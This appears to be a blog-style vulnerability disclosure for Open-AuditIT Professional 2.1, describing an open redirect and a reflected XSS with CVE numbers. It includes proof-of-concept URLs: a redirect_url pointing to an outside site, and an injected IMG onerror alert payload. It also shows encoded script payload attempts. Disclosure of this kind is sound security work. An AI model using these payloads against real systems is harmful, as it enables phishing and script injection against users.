Open Redirect to Reflected XSS - Open-AuditIT Professional 2.1

Hi All,

Recently in one of my pentest research, I found a Open-AuditIT Professional 2.1.

Open-AudIT is a network auditing application. It is based on the scripting languages of PHP, Bash and VBScript. Open-AudIT can tell what is on your network, how it is configured and if there have been any changes

Curious to explore its functionalities, I downloaded and set it up in my local system.

After installing first thing I noticed was `redirect_url=`

For me its cup of tea to get open URL Redirect.

  • Title of the Vulnerability:  Open URL Redirect and Reflected Cross-site Scripting (XSS) 
  • Vulnerability Class: Security Misconfiguration and Cross-site Scripting (XSS)
  • Technical Details & Description: The application source code is coded in a way which allows arbitrary web application to accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  • CVE ID allocated:   
  1. Open Redirect :-  CVE-2018-8937
  2. Reflected XSS :- CVE-2018-8978
  • Product & Service Introduction: Open-AuditIT Professional 2.1

POC :- 



Vulnerable URL :- 
http://localhost/omk/open-audit/login?redirect_url=http://www.nileshsapariya.blogspot.com




Lets move ahead one more step

Now in most of the case when you find the Open URL Redirection then chances to have XSS is almost 99%

1st Try for Reflected XSS 

1]
<script>alert('BOOM')</script>
Base 64 Encode
PHNjcmlwdD5hbGVydCgnQk9PTScpPC9zY3JpcHQ+

2]
data:text/html;base64,PHNjcmlwdD5hbGVydCgnQk9PTScpPC9zY3JpcHQ+

3]
URL Encode

%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%51%6b%39%50%54%53%63%70%50%43%39%7a%59%33%4a%70%63%48%51%2b






But hey this is not XSS

2nd Try for Reflected XSS 

XSS via a crafted src attribute of an IMG element within a URI.


Vulnerable URL :-
http://localhost/omk/open-audit/y3ipe%3cimg%20src%3da%20onerror%3dalert('hacked')%3ek87ss

Video POC for Reflected XSS




How this worked :-














Share this

Related Posts

Previous
Next Post »